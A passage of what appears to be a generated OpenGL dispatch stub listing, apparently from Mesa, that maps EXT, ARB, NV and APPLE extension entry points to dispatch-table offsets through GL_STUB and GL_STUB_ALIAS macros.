GL_STUB(_dispatch_stub_734, _gloffset_BindVertexArrayAPPLE, _dispatch_stub_734@4)
HIDDEN(GL_PREFIX(_dispatch_stub_734, _dispatch_stub_734@4))
GL_STUB(_dispatch_stub_735, _gloffset_DeleteVertexArraysAPPLE, _dispatch_stub_735@8)
HIDDEN(GL_PREFIX(_dispatch_stub_735, _dispatch_stub_735@8))
GL_STUB(_dispatch_stub_736, _gloffset_GenVertexArraysAPPLE, _dispatch_stub_736@8)
HIDDEN(GL_PREFIX(_dispatch_stub_736, _dispatch_stub_736@8))
GL_STUB(_dispatch_stub_737, _gloffset_IsVertexArrayAPPLE, _dispatch_stub_737@4)
HIDDEN(GL_PREFIX(_dispatch_stub_737, _dispatch_stub_737@4))
GL_STUB(GetProgramNamedParameterdvNV, _gloffset_GetProgramNamedParameterdvNV, GetProgramNamedParameterdvNV@16)
GL_STUB(GetProgramNamedParameterfvNV, _gloffset_GetProgramNamedParameterfvNV, GetProgramNamedParameterfvNV@16)
GL_STUB(ProgramNamedParameter4dNV, _gloffset_ProgramNamedParameter4dNV, ProgramNamedParameter4dNV@44)
GL_STUB(ProgramNamedParameter4dvNV, _gloffset_ProgramNamedParameter4dvNV, ProgramNamedParameter4dvNV@16)
GL_STUB(ProgramNamedParameter4fNV, _gloffset_ProgramNamedParameter4fNV, ProgramNamedParameter4fNV@28)
GL_STUB(ProgramNamedParameter4fvNV, _gloffset_ProgramNamedParameter4fvNV, ProgramNamedParameter4fvNV@16)
GL_STUB(_dispatch_stub_744, _gloffset_DepthBoundsEXT, _dispatch_stub_744@16)
HIDDEN(GL_PREFIX(_dispatch_stub_744, _dispatch_stub_744@16))
GL_STUB(_dispatch_stub_745, _gloffset_BlendEquationSeparateEXT, _dispatch_stub_745@8)
HIDDEN(GL_PREFIX(_dispatch_stub_745, _dispatch_stub_745@8))
GL_STUB(BindFramebufferEXT, _gloffset_BindFramebufferEXT, BindFramebufferEXT@8)
GL_STUB(BindRenderbufferEXT, _gloffset_BindRenderbufferEXT, BindRenderbufferEXT@8)
GL_STUB(CheckFramebufferStatusEXT, _gloffset_CheckFramebufferStatusEXT, CheckFramebufferStatusEXT@4)
GL_STUB(DeleteFramebuffersEXT, _gloffset_DeleteFramebuffersEXT, DeleteFramebuffersEXT@8)
GL_STUB(DeleteRenderbuffersEXT, _gloffset_DeleteRenderbuffersEXT, DeleteRenderbuffersEXT@8)
GL_STUB(FramebufferRenderbufferEXT, _gloffset_FramebufferRenderbufferEXT, FramebufferRenderbufferEXT@16)
GL_STUB(FramebufferTexture1DEXT, _gloffset_FramebufferTexture1DEXT, FramebufferTexture1DEXT@20)
GL_STUB(FramebufferTexture2DEXT, _gloffset_FramebufferTexture2DEXT, FramebufferTexture2DEXT@20)
GL_STUB(FramebufferTexture3DEXT, _gloffset_FramebufferTexture3DEXT, FramebufferTexture3DEXT@24)
GL_STUB(GenFramebuffersEXT, _gloffset_GenFramebuffersEXT, GenFramebuffersEXT@8)
GL_STUB(GenRenderbuffersEXT, _gloffset_GenRenderbuffersEXT, GenRenderbuffersEXT@8)
GL_STUB(GenerateMipmapEXT, _gloffset_GenerateMipmapEXT, GenerateMipmapEXT@4)
GL_STUB(GetFramebufferAttachmentParameterivEXT, _gloffset_GetFramebufferAttachmentParameterivEXT, GetFramebufferAttachmentParameterivEXT@16)
GL_STUB(GetRenderbufferParameterivEXT, _gloffset_GetRenderbufferParameterivEXT, GetRenderbufferParameterivEXT@12)
GL_STUB(IsFramebufferEXT, _gloffset_IsFramebufferEXT, IsFramebufferEXT@4)
GL_STUB(IsRenderbufferEXT, _gloffset_IsRenderbufferEXT, IsRenderbufferEXT@4)
GL_STUB(RenderbufferStorageEXT, _gloffset_RenderbufferStorageEXT, RenderbufferStorageEXT@16)
GL_STUB(_dispatch_stub_763, _gloffset_BlitFramebufferEXT, _dispatch_stub_763@40)
HIDDEN(GL_PREFIX(_dispatch_stub_763, _dispatch_stub_763@40))
GL_STUB(FramebufferTextureLayerEXT, _gloffset_FramebufferTextureLayerEXT, FramebufferTextureLayerEXT@20)
GL_STUB(_dispatch_stub_765, _gloffset_StencilFuncSeparateATI, _dispatch_stub_765@16)
HIDDEN(GL_PREFIX(_dispatch_stub_765, _dispatch_stub_765@16))
GL_STUB(_dispatch_stub_766, _gloffset_ProgramEnvParameters4fvEXT, _dispatch_stub_766@16)
HIDDEN(GL_PREFIX(_dispatch_stub_766, _dispatch_stub_766@16))
GL_STUB(_dispatch_stub_767, _gloffset_ProgramLocalParameters4fvEXT, _dispatch_stub_767@16)
HIDDEN(GL_PREFIX(_dispatch_stub_767, _dispatch_stub_767@16))
GL_STUB(_dispatch_stub_768, _gloffset_GetQueryObjecti64vEXT, _dispatch_stub_768@12)
HIDDEN(GL_PREFIX(_dispatch_stub_768, _dispatch_stub_768@12))
GL_STUB(_dispatch_stub_769, _gloffset_GetQueryObjectui64vEXT, _dispatch_stub_769@12)
HIDDEN(GL_PREFIX(_dispatch_stub_769, _dispatch_stub_769@12))
GL_STUB_ALIAS(ArrayElementEXT, _gloffset_ArrayElement, ArrayElementEXT@4, ArrayElement, ArrayElement@4)
GL_STUB_ALIAS(BindTextureEXT, _gloffset_BindTexture, BindTextureEXT@8, BindTexture, BindTexture@8)
GL_STUB_ALIAS(DrawArraysEXT, _gloffset_DrawArrays, DrawArraysEXT@12, DrawArrays, DrawArrays@12)
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(AreTexturesResidentEXT, _gloffset_AreTexturesResident, AreTexturesResidentEXT@12, AreTexturesResident, AreTexturesResident@12)
#endif
GL_STUB_ALIAS(CopyTexImage1DEXT, _gloffset_CopyTexImage1D, CopyTexImage1DEXT@28, CopyTexImage1D, CopyTexImage1D@28)
GL_STUB_ALIAS(CopyTexImage2DEXT, _gloffset_CopyTexImage2D, CopyTexImage2DEXT@32, CopyTexImage2D, CopyTexImage2D@32)
GL_STUB_ALIAS(CopyTexSubImage1DEXT, _gloffset_CopyTexSubImage1D, CopyTexSubImage1DEXT@24, CopyTexSubImage1D, CopyTexSubImage1D@24)
GL_STUB_ALIAS(CopyTexSubImage2DEXT, _gloffset_CopyTexSubImage2D, CopyTexSubImage2DEXT@32, CopyTexSubImage2D, CopyTexSubImage2D@32)
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(DeleteTexturesEXT, _gloffset_DeleteTextures, DeleteTexturesEXT@8, DeleteTextures, DeleteTextures@8)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GenTexturesEXT, _gloffset_GenTextures, GenTexturesEXT@8, GenTextures, GenTextures@8)
#endif
GL_STUB_ALIAS(GetPointervEXT, _gloffset_GetPointerv, GetPointervEXT@8, GetPointerv, GetPointerv@8)
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(IsTextureEXT, _gloffset_IsTexture, IsTextureEXT@4, IsTexture, IsTexture@4)
#endif
GL_STUB_ALIAS(PrioritizeTexturesEXT, _gloffset_PrioritizeTextures, PrioritizeTexturesEXT@12, PrioritizeTextures, PrioritizeTextures@12)
GL_STUB_ALIAS(TexSubImage1DEXT, _gloffset_TexSubImage1D, TexSubImage1DEXT@28, TexSubImage1D, TexSubImage1D@28)
GL_STUB_ALIAS(TexSubImage2DEXT, _gloffset_TexSubImage2D, TexSubImage2DEXT@36, TexSubImage2D, TexSubImage2D@36)
GL_STUB_ALIAS(BlendColorEXT, _gloffset_BlendColor, BlendColorEXT@16, BlendColor, BlendColor@16)
GL_STUB_ALIAS(BlendEquationEXT, _gloffset_BlendEquation, BlendEquationEXT@4, BlendEquation, BlendEquation@4)
GL_STUB_ALIAS(DrawRangeElementsEXT, _gloffset_DrawRangeElements, DrawRangeElementsEXT@24, DrawRangeElements, DrawRangeElements@24)
GL_STUB_ALIAS(ColorTableSGI, _gloffset_ColorTable, ColorTableSGI@24, ColorTable, ColorTable@24)
GL_STUB_ALIAS(ColorTableEXT, _gloffset_ColorTable, ColorTableEXT@24, ColorTable, ColorTable@24)
GL_STUB_ALIAS(ColorTableParameterfvSGI, _gloffset_ColorTableParameterfv, ColorTableParameterfvSGI@12, ColorTableParameterfv, ColorTableParameterfv@12)
GL_STUB_ALIAS(ColorTableParameterivSGI, _gloffset_ColorTableParameteriv, ColorTableParameterivSGI@12, ColorTableParameteriv, ColorTableParameteriv@12)
GL_STUB_ALIAS(CopyColorTableSGI, _gloffset_CopyColorTable, CopyColorTableSGI@20, CopyColorTable, CopyColorTable@20)
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetColorTableSGI, _gloffset_GetColorTable, GetColorTableSGI@16, GetColorTable, GetColorTable@16)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetColorTableEXT, _gloffset_GetColorTable, GetColorTableEXT@16, GetColorTable, GetColorTable@16)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetColorTableParameterfvSGI, _gloffset_GetColorTableParameterfv, GetColorTableParameterfvSGI@12, GetColorTableParameterfv, GetColorTableParameterfv@12)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetColorTableParameterfvEXT, _gloffset_GetColorTableParameterfv, GetColorTableParameterfvEXT@12, GetColorTableParameterfv, GetColorTableParameterfv@12)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetColorTableParameterivSGI, _gloffset_GetColorTableParameteriv, GetColorTableParameterivSGI@12, GetColorTableParameteriv, GetColorTableParameteriv@12)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetColorTableParameterivEXT, _gloffset_GetColorTableParameteriv, GetColorTableParameterivEXT@12, GetColorTableParameteriv, GetColorTableParameteriv@12)
#endif
GL_STUB_ALIAS(ColorSubTableEXT, _gloffset_ColorSubTable, ColorSubTableEXT@24, ColorSubTable, ColorSubTable@24)
GL_STUB_ALIAS(CopyColorSubTableEXT, _gloffset_CopyColorSubTable, CopyColorSubTableEXT@20, CopyColorSubTable, CopyColorSubTable@20)
GL_STUB_ALIAS(ConvolutionFilter1DEXT, _gloffset_ConvolutionFilter1D, ConvolutionFilter1DEXT@24, ConvolutionFilter1D, ConvolutionFilter1D@24)
GL_STUB_ALIAS(ConvolutionFilter2DEXT, _gloffset_ConvolutionFilter2D, ConvolutionFilter2DEXT@28, ConvolutionFilter2D, ConvolutionFilter2D@28)
GL_STUB_ALIAS(ConvolutionParameterfEXT, _gloffset_ConvolutionParameterf, ConvolutionParameterfEXT@12, ConvolutionParameterf, ConvolutionParameterf@12)
GL_STUB_ALIAS(ConvolutionParameterfvEXT, _gloffset_ConvolutionParameterfv, ConvolutionParameterfvEXT@12, ConvolutionParameterfv, ConvolutionParameterfv@12)
GL_STUB_ALIAS(ConvolutionParameteriEXT, _gloffset_ConvolutionParameteri, ConvolutionParameteriEXT@12, ConvolutionParameteri, ConvolutionParameteri@12)
GL_STUB_ALIAS(ConvolutionParameterivEXT, _gloffset_ConvolutionParameteriv, ConvolutionParameterivEXT@12, ConvolutionParameteriv, ConvolutionParameteriv@12)
GL_STUB_ALIAS(CopyConvolutionFilter1DEXT, _gloffset_CopyConvolutionFilter1D, CopyConvolutionFilter1DEXT@20, CopyConvolutionFilter1D, CopyConvolutionFilter1D@20)
GL_STUB_ALIAS(CopyConvolutionFilter2DEXT, _gloffset_CopyConvolutionFilter2D, CopyConvolutionFilter2DEXT@24, CopyConvolutionFilter2D, CopyConvolutionFilter2D@24)
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetConvolutionFilterEXT, _gloffset_GetConvolutionFilter, GetConvolutionFilterEXT@16, GetConvolutionFilter, GetConvolutionFilter@16)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetConvolutionParameterfvEXT, _gloffset_GetConvolutionParameterfv, GetConvolutionParameterfvEXT@12, GetConvolutionParameterfv, GetConvolutionParameterfv@12)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetConvolutionParameterivEXT, _gloffset_GetConvolutionParameteriv, GetConvolutionParameterivEXT@12, GetConvolutionParameteriv, GetConvolutionParameteriv@12)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetSeparableFilterEXT, _gloffset_GetSeparableFilter, GetSeparableFilterEXT@24, GetSeparableFilter, GetSeparableFilter@24)
#endif
GL_STUB_ALIAS(SeparableFilter2DEXT, _gloffset_SeparableFilter2D, SeparableFilter2DEXT@32, SeparableFilter2D, SeparableFilter2D@32)
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetHistogramEXT, _gloffset_GetHistogram, GetHistogramEXT@20, GetHistogram, GetHistogram@20)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetHistogramParameterfvEXT, _gloffset_GetHistogramParameterfv, GetHistogramParameterfvEXT@12, GetHistogramParameterfv, GetHistogramParameterfv@12)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetHistogramParameterivEXT, _gloffset_GetHistogramParameteriv, GetHistogramParameterivEXT@12, GetHistogramParameteriv, GetHistogramParameteriv@12)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetMinmaxEXT, _gloffset_GetMinmax, GetMinmaxEXT@20, GetMinmax, GetMinmax@20)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetMinmaxParameterfvEXT, _gloffset_GetMinmaxParameterfv, GetMinmaxParameterfvEXT@12, GetMinmaxParameterfv, GetMinmaxParameterfv@12)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetMinmaxParameterivEXT, _gloffset_GetMinmaxParameteriv, GetMinmaxParameterivEXT@12, GetMinmaxParameteriv, GetMinmaxParameteriv@12)
#endif
GL_STUB_ALIAS(HistogramEXT, _gloffset_Histogram, HistogramEXT@16, Histogram, Histogram@16)
GL_STUB_ALIAS(MinmaxEXT, _gloffset_Minmax, MinmaxEXT@12, Minmax, Minmax@12)
GL_STUB_ALIAS(ResetHistogramEXT, _gloffset_ResetHistogram, ResetHistogramEXT@4, ResetHistogram, ResetHistogram@4)
GL_STUB_ALIAS(ResetMinmaxEXT, _gloffset_ResetMinmax, ResetMinmaxEXT@4, ResetMinmax, ResetMinmax@4)
GL_STUB_ALIAS(TexImage3DEXT, _gloffset_TexImage3D, TexImage3DEXT@40, TexImage3D, TexImage3D@40)
GL_STUB_ALIAS(TexSubImage3DEXT, _gloffset_TexSubImage3D, TexSubImage3DEXT@44, TexSubImage3D, TexSubImage3D@44)
GL_STUB_ALIAS(CopyTexSubImage3DEXT, _gloffset_CopyTexSubImage3D, CopyTexSubImage3DEXT@36, CopyTexSubImage3D, CopyTexSubImage3D@36)
GL_STUB_ALIAS(ActiveTexture, _gloffset_ActiveTextureARB, ActiveTexture@4, ActiveTextureARB, ActiveTextureARB@4)
GL_STUB_ALIAS(ClientActiveTexture, _gloffset_ClientActiveTextureARB, ClientActiveTexture@4, ClientActiveTextureARB, ClientActiveTextureARB@4)
GL_STUB_ALIAS(MultiTexCoord1d, _gloffset_MultiTexCoord1dARB, MultiTexCoord1d@12, MultiTexCoord1dARB, MultiTexCoord1dARB@12)
GL_STUB_ALIAS(MultiTexCoord1dv, _gloffset_MultiTexCoord1dvARB, MultiTexCoord1dv@8, MultiTexCoord1dvARB, MultiTexCoord1dvARB@8)
GL_STUB_ALIAS(MultiTexCoord1f, _gloffset_MultiTexCoord1fARB, MultiTexCoord1f@8, MultiTexCoord1fARB, MultiTexCoord1fARB@8)
GL_STUB_ALIAS(MultiTexCoord1fv, _gloffset_MultiTexCoord1fvARB, MultiTexCoord1fv@8, MultiTexCoord1fvARB, MultiTexCoord1fvARB@8)
GL_STUB_ALIAS(MultiTexCoord1i, _gloffset_MultiTexCoord1iARB, MultiTexCoord1i@8, MultiTexCoord1iARB, MultiTexCoord1iARB@8)
GL_STUB_ALIAS(MultiTexCoord1iv, _gloffset_MultiTexCoord1ivARB, MultiTexCoord1iv@8, MultiTexCoord1ivARB, MultiTexCoord1ivARB@8)
GL_STUB_ALIAS(MultiTexCoord1s, _gloffset_MultiTexCoord1sARB, MultiTexCoord1s@8, MultiTexCoord1sARB, MultiTexCoord1sARB@8)
GL_STUB_ALIAS(MultiTexCoord1sv, _gloffset_MultiTexCoord1svARB, MultiTexCoord1sv@8, MultiTexCoord1svARB, MultiTexCoord1svARB@8)
GL_STUB_ALIAS(MultiTexCoord2d, _gloffset_MultiTexCoord2dARB, MultiTexCoord2d@20, MultiTexCoord2dARB, MultiTexCoord2dARB@20)
GL_STUB_ALIAS(MultiTexCoord2dv, _gloffset_MultiTexCoord2dvARB, MultiTexCoord2dv@8, MultiTexCoord2dvARB, MultiTexCoord2dvARB@8)
GL_STUB_ALIAS(MultiTexCoord2f, _gloffset_MultiTexCoord2fARB, MultiTexCoord2f@12, MultiTexCoord2fARB, MultiTexCoord2fARB@12)
GL_STUB_ALIAS(MultiTexCoord2fv, _gloffset_MultiTexCoord2fvARB, MultiTexCoord2fv@8, MultiTexCoord2fvARB, MultiTexCoord2fvARB@8)
GL_STUB_ALIAS(MultiTexCoord2i, _gloffset_MultiTexCoord2iARB, MultiTexCoord2i@12, MultiTexCoord2iARB, MultiTexCoord2iARB@12)
GL_STUB_ALIAS(MultiTexCoord2iv, _gloffset_MultiTexCoord2ivARB, MultiTexCoord2iv@8, MultiTexCoord2ivARB, MultiTexCoord2ivARB@8)
GL_STUB_ALIAS(MultiTexCoord2s, _gloffset_MultiTexCoord2sARB, MultiTexCoord2s@12, MultiTexCoord2sARB, MultiTexCoord2sARB@12)
GL_STUB_ALIAS(MultiTexCoord2sv, _gloffset_MultiTexCoord2svARB, MultiTexCoord2sv@8, MultiTexCoord2svARB, MultiTexCoord2svARB@8)
GL_STUB_ALIAS(MultiTexCoord3d, _gloffset_MultiTexCoord3dARB, MultiTexCoord3d@28, MultiTexCoord3dARB, MultiTexCoord3dARB@28)
GL_STUB_ALIAS(MultiTexCoord3dv, _gloffset_MultiTexCoord3dvARB, MultiTexCoord3dv@8, MultiTexCoord3dvARB, MultiTexCoord3dvARB@8)
GL_STUB_ALIAS(MultiTexCoord3f, _gloffset_MultiTexCoord3fARB, MultiTexCoord3f@16, MultiTexCoord3fARB, MultiTexCoord3fARB@16)
GL_STUB_ALIAS(MultiTexCoord3fv, _gloffset_MultiTexCoord3fvARB, MultiTexCoord3fv@8, MultiTexCoord3fvARB, MultiTexCoord3fvARB@8)
GL_STUB_ALIAS(MultiTexCoord3i, _gloffset_MultiTexCoord3iARB, MultiTexCoord3i@16, MultiTexCoord3iARB, MultiTexCoord3iARB@16)
GL_STUB_ALIAS(MultiTexCoord3iv, _gloffset_MultiTexCoord3ivARB, MultiTexCoord3iv@8, MultiTexCoord3ivARB, MultiTexCoord3ivARB@8)
GL_STUB_ALIAS(MultiTexCoord3s, _gloffset_MultiTexCoord3sARB, MultiTexCoord3s@16, MultiTexCoord3sARB, MultiTexCoord3sARB@16)
GL_STUB_ALIAS(MultiTexCoord3sv, _gloffset_MultiTexCoord3svARB, MultiTexCoord3sv@8, MultiTexCoord3svARB, MultiTexCoord3svARB@8)
GL_STUB_ALIAS(MultiTexCoord4d, _gloffset_MultiTexCoord4dARB, MultiTexCoord4d@36, MultiTexCoord4dARB, MultiTexCoord4dARB@36)
GL_STUB_ALIAS(MultiTexCoord4dv, _gloffset_MultiTexCoord4dvARB, MultiTexCoord4dv@8, MultiTexCoord4dvARB, MultiTexCoord4dvARB@8)
GL_STUB_ALIAS(MultiTexCoord4f, _gloffset_MultiTexCoord4fARB, MultiTexCoord4f@20, MultiTexCoord4fARB, MultiTexCoord4fARB@20)
GL_STUB_ALIAS(MultiTexCoord4fv, _gloffset_MultiTexCoord4fvARB, MultiTexCoord4fv@8, MultiTexCoord4fvARB, MultiTexCoord4fvARB@8)
GL_STUB_ALIAS(MultiTexCoord4i, _gloffset_MultiTexCoord4iARB, MultiTexCoord4i@20, MultiTexCoord4iARB, MultiTexCoord4iARB@20)
GL_STUB_ALIAS(MultiTexCoord4iv, _gloffset_MultiTexCoord4ivARB, MultiTexCoord4iv@8, MultiTexCoord4ivARB, MultiTexCoord4ivARB@8)
GL_STUB_ALIAS(MultiTexCoord4s, _gloffset_MultiTexCoord4sARB, MultiTexCoord4s@20, MultiTexCoord4sARB, MultiTexCoord4sARB@20)
GL_STUB_ALIAS(MultiTexCoord4sv, _gloffset_MultiTexCoord4svARB, MultiTexCoord4sv@8, MultiTexCoord4svARB, MultiTexCoord4svARB@8)
GL_STUB_ALIAS(StencilOpSeparateATI, _gloffset_StencilOpSeparate, StencilOpSeparateATI@16, StencilOpSeparate, StencilOpSeparate@16)
GL_STUB_ALIAS(LoadTransposeMatrixd, _gloffset_LoadTransposeMatrixdARB, LoadTransposeMatrixd@4, LoadTransposeMatrixdARB, LoadTransposeMatrixdARB@4)
GL_STUB_ALIAS(LoadTransposeMatrixf, _gloffset_LoadTransposeMatrixfARB, LoadTransposeMatrixf@4, LoadTransposeMatrixfARB, LoadTransposeMatrixfARB@4)
GL_STUB_ALIAS(MultTransposeMatrixd, _gloffset_MultTransposeMatrixdARB, MultTransposeMatrixd@4, MultTransposeMatrixdARB, MultTransposeMatrixdARB@4)
GL_STUB_ALIAS(MultTransposeMatrixf, _gloffset_MultTransposeMatrixfARB, MultTransposeMatrixf@4, MultTransposeMatrixfARB, MultTransposeMatrixfARB@4)
GL_STUB_ALIAS(SampleCoverage, _gloffset_SampleCoverageARB, SampleCoverage@8, SampleCoverageARB, SampleCoverageARB@8)
GL_STUB_ALIAS(CompressedTexImage1D, _gloffset_CompressedTexImage1DARB, CompressedTexImage1D@28, CompressedTexImage1DARB, CompressedTexImage1DARB@28)
GL_STUB_ALIAS(CompressedTexImage2D, _gloffset_CompressedTexImage2DARB, CompressedTexImage2D@32, CompressedTexImage2DARB, CompressedTexImage2DARB@32)
GL_STUB_ALIAS(CompressedTexImage3D, _gloffset_CompressedTexImage3DARB, CompressedTexImage3D@36, CompressedTexImage3DARB, CompressedTexImage3DARB@36)
GL_STUB_ALIAS(CompressedTexSubImage1D, _gloffset_CompressedTexSubImage1DARB, CompressedTexSubImage1D@28, CompressedTexSubImage1DARB, CompressedTexSubImage1DARB@28)
GL_STUB_ALIAS(CompressedTexSubImage2D, _gloffset_CompressedTexSubImage2DARB, CompressedTexSubImage2D@36, CompressedTexSubImage2DARB, CompressedTexSubImage2DARB@36)
GL_STUB_ALIAS(CompressedTexSubImage3D, _gloffset_CompressedTexSubImage3DARB, CompressedTexSubImage3D@44, CompressedTexSubImage3DARB, CompressedTexSubImage3DARB@44)
GL_STUB_ALIAS(GetCompressedTexImage, _gloffset_GetCompressedTexImageARB, GetCompressedTexImage@12, GetCompressedTexImageARB, GetCompressedTexImageARB@12)
GL_STUB_ALIAS(DisableVertexAttribArray, _gloffset_DisableVertexAttribArrayARB, DisableVertexAttribArray@4, DisableVertexAttribArrayARB, DisableVertexAttribArrayARB@4)
GL_STUB_ALIAS(EnableVertexAttribArray, _gloffset_EnableVertexAttribArrayARB, EnableVertexAttribArray@4, EnableVertexAttribArrayARB, EnableVertexAttribArrayARB@4)
GL_STUB_ALIAS(GetVertexAttribdv, _gloffset_GetVertexAttribdvARB, GetVertexAttribdv@12, GetVertexAttribdvARB, GetVertexAttribdvARB@12)
GL_STUB_ALIAS(GetVertexAttribfv, _gloffset_GetVertexAttribfvARB, GetVertexAttribfv@12, GetVertexAttribfvARB, GetVertexAttribfvARB@12)
GL_STUB_ALIAS(GetVertexAttribiv, _gloffset_GetVertexAttribivARB, GetVertexAttribiv@12, GetVertexAttribivARB, GetVertexAttribivARB@12)
GL_STUB_ALIAS(ProgramParameter4dNV, _gloffset_ProgramEnvParameter4dARB, ProgramParameter4dNV@40, ProgramEnvParameter4dARB, ProgramEnvParameter4dARB@40)
GL_STUB_ALIAS(ProgramParameter4dvNV, _gloffset_ProgramEnvParameter4dvARB, ProgramParameter4dvNV@12, ProgramEnvParameter4dvARB, ProgramEnvParameter4dvARB@12)
GL_STUB_ALIAS(ProgramParameter4fNV, _gloffset_ProgramEnvParameter4fARB, ProgramParameter4fNV@24, ProgramEnvParameter4fARB, ProgramEnvParameter4fARB@24)
GL_STUB_ALIAS(ProgramParameter4fvNV, _gloffset_ProgramEnvParameter4fvARB, ProgramParameter4fvNV@12, ProgramEnvParameter4fvARB, ProgramEnvParameter4fvARB@12)
GL_STUB_ALIAS(VertexAttrib1d, _gloffset_VertexAttrib1dARB, VertexAttrib1d@12, VertexAttrib1dARB, VertexAttrib1dARB@12)
GL_STUB_ALIAS(VertexAttrib1dv, _gloffset_VertexAttrib1dvARB, VertexAttrib1dv@8, VertexAttrib1dvARB, VertexAttrib1dvARB@8)
GL_STUB_ALIAS(VertexAttrib1f, _gloffset_VertexAttrib1fARB, VertexAttrib1f@8, VertexAttrib1fARB, VertexAttrib1fARB@8)
GL_STUB_ALIAS(VertexAttrib1fv, _gloffset_VertexAttrib1fvARB, VertexAttrib1fv@8, VertexAttrib1fvARB, VertexAttrib1fvARB@8)
GL_STUB_ALIAS(VertexAttrib1s, _gloffset_VertexAttrib1sARB, VertexAttrib1s@8, VertexAttrib1sARB, VertexAttrib1sARB@8)
GL_STUB_ALIAS(VertexAttrib1sv, _gloffset_VertexAttrib1svARB, VertexAttrib1sv@8, VertexAttrib1svARB, VertexAttrib1svARB@8)
GL_STUB_ALIAS(VertexAttrib2d, _gloffset_VertexAttrib2dARB, VertexAttrib2d@20, VertexAttrib2dARB, VertexAttrib2dARB@20)
GL_STUB_ALIAS(VertexAttrib2dv, _gloffset_VertexAttrib2dvARB, VertexAttrib2dv@8, VertexAttrib2dvARB, VertexAttrib2dvARB@8)
GL_STUB_ALIAS(VertexAttrib2f, _gloffset_VertexAttrib2fARB, VertexAttrib2f@12, VertexAttrib2fARB, VertexAttrib2fARB@12)
GL_STUB_ALIAS(VertexAttrib2fv, _gloffset_VertexAttrib2fvARB, VertexAttrib2fv@8, VertexAttrib2fvARB, VertexAttrib2fvARB@8)
GL_STUB_ALIAS(VertexAttrib2s, _gloffset_VertexAttrib2sARB, VertexAttrib2s@12, VertexAttrib2sARB, VertexAttrib2sARB@12)
GL_STUB_ALIAS(VertexAttrib2sv, _gloffset_VertexAttrib2svARB, VertexAttrib2sv@8, VertexAttrib2svARB, VertexAttrib2svARB@8)
GL_STUB_ALIAS(VertexAttrib3d, _gloffset_VertexAttrib3dARB, VertexAttrib3d@28, VertexAttrib3dARB, VertexAttrib3dARB@28)
GL_STUB_ALIAS(VertexAttrib3dv, _gloffset_VertexAttrib3dvARB, VertexAttrib3dv@8, VertexAttrib3dvARB, VertexAttrib3dvARB@8)
GL_STUB_ALIAS(VertexAttrib3f, _gloffset_VertexAttrib3fARB, VertexAttrib3f@16, VertexAttrib3fARB, VertexAttrib3fARB@16)
GL_STUB_ALIAS(VertexAttrib3fv, _gloffset_VertexAttrib3fvARB, VertexAttrib3fv@8, VertexAttrib3fvARB, VertexAttrib3fvARB@8)
GL_STUB_ALIAS(VertexAttrib3s, _gloffset_VertexAttrib3sARB, VertexAttrib3s@16, VertexAttrib3sARB, VertexAttrib3sARB@16)
GL_STUB_ALIAS(VertexAttrib3sv, _gloffset_VertexAttrib3svARB, VertexAttrib3sv@8, VertexAttrib3svARB, VertexAttrib3svARB@8)
GL_STUB_ALIAS(VertexAttrib4Nbv, _gloffset_VertexAttrib4NbvARB, VertexAttrib4Nbv@8, VertexAttrib4NbvARB, VertexAttrib4NbvARB@8)
GL_STUB_ALIAS(VertexAttrib4Niv, _gloffset_VertexAttrib4NivARB, VertexAttrib4Niv@8, VertexAttrib4NivARB, VertexAttrib4NivARB@8)
GL_STUB_ALIAS(VertexAttrib4Nsv, _gloffset_VertexAttrib4NsvARB, VertexAttrib4Nsv@8, VertexAttrib4NsvARB, VertexAttrib4NsvARB@8)
GL_STUB_ALIAS(VertexAttrib4Nub, _gloffset_VertexAttrib4NubARB, VertexAttrib4Nub@20, VertexAttrib4NubARB, VertexAttrib4NubARB@20)
GL_STUB_ALIAS(VertexAttrib4Nubv, _gloffset_VertexAttrib4NubvARB, VertexAttrib4Nubv@8, VertexAttrib4NubvARB, VertexAttrib4NubvARB@8)
GL_STUB_ALIAS(VertexAttrib4Nuiv, _gloffset_VertexAttrib4NuivARB, VertexAttrib4Nuiv@8, VertexAttrib4NuivARB, VertexAttrib4NuivARB@8)
GL_STUB_ALIAS(VertexAttrib4Nusv, _gloffset_VertexAttrib4NusvARB, VertexAttrib4Nusv@8, VertexAttrib4NusvARB, VertexAttrib4NusvARB@8)
GL_STUB_ALIAS(VertexAttrib4bv, _gloffset_VertexAttrib4bvARB, VertexAttrib4bv@8, VertexAttrib4bvARB, VertexAttrib4bvARB@8)
GL_STUB_ALIAS(VertexAttrib4d, _gloffset_VertexAttrib4dARB, VertexAttrib4d@36, VertexAttrib4dARB, VertexAttrib4dARB@36)
GL_STUB_ALIAS(VertexAttrib4dv, _gloffset_VertexAttrib4dvARB, VertexAttrib4dv@8, VertexAttrib4dvARB, VertexAttrib4dvARB@8)
GL_STUB_ALIAS(VertexAttrib4f, _gloffset_VertexAttrib4fARB, VertexAttrib4f@20, VertexAttrib4fARB, VertexAttrib4fARB@20)
GL_STUB_ALIAS(VertexAttrib4fv, _gloffset_VertexAttrib4fvARB, VertexAttrib4fv@8, VertexAttrib4fvARB, VertexAttrib4fvARB@8)
GL_STUB_ALIAS(VertexAttrib4iv, _gloffset_VertexAttrib4ivARB, VertexAttrib4iv@8, VertexAttrib4ivARB, VertexAttrib4ivARB@8)
